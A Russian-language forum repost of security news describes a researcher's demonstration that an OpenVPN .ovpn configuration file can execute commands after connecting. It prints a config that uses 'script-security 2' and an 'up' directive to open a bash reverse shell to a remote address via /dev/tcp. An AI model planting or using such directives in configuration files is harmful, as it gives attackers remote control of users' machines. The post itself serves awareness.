Атакующий может превратить безопасный конфигурационный файл во вредоносный, добавив всего несколько строк кода.
Специалисты в области кибербезопасности неоднократно предупреждали о рисках загрузки контента из непроверенных источников, поскольку многие из таких файлов могут содержать вредоносный код, нежелательное рекламное ПО или скрипты, осуществляющие вредоносную деятельность на компьютере. Исследователь Джейкоб Бэйнс (Jacob Baines) продемонстрировал, как простой конфигурационный файл (.ovpn) клиента OpenVPN может использоваться для выполнения команд на компьютере после установки VPN-соединения.
Согласно Бэйнсу, для превращения безопасного конфигурационного файла во вредоносный злоумышленникам потребуется всего лишь добавить несколько строк кода. В примере исследователя, конфигурационный файл имеет следующий вид:
Code:
remote 192.168.1.245 ifconfig 10.200.0.2 10.200.0.1 dev tun
Если злоумышленнику требуется выполнить команду, он может добавить строку script-security 2 (разрешает OpenVPN выполнять пользовательские скрипты) и запись "up", содержащую команду, которая выполнится после установки соединения.
Code:
remote 192.168.1.245 ifconfig 10.200.0.2 10.200.0.1 dev tun script-security 2 up “/bin/bash -c ‘/bin/bash -i > /dev/tcp/192.168.1.218/8181 0<&1 2>&1&’”
Таким образом атакующий получит возможность удаленно выполнить команды на компьютере с запущенным файлом конфигурации OpenVPN.
По словам эксперта, данный метод также может использоваться для атак на пользователей компьютеров под управлением Windows с помощью скрипта PowerShell. Более подробно техника описана
https://medium.com/tenable-techblog/...e-73fd8b1d38da
04-03-2025, 04:09 AM
Threaded Mode